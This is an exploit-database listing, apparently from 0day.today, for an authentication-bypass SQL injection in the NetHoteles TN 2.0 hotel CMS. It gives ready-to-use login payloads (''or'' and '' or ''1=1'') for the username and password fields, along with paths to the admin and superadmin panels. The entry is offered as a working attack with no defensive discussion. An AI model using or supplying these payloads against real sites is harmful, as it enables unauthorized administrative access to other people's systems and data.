[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability

Author
The_Exploited
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11636
Category
web applications
Date add
05-04-2010
Platform
php
===========================================================
NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability
===========================================================

@Title: NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability
  @Author: The_Exploited aka l3d aka Spoof
  @Mail: spoof@live.it
  @Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
  @Exploit:
Username: 'or'
Password: 'or'
  or
  Username: ' or '1=1
Password: ' or '1=1
  @Demo for superdamin dir.: http://www.site.com/nethoteles/superadmin
  @Demo for admin dir.: http://www.site.com/nethoteles/admin
  @CMS Version: <= 2.0
  @Date: 2010-02-13



#  0day.today [2024-12-27]  #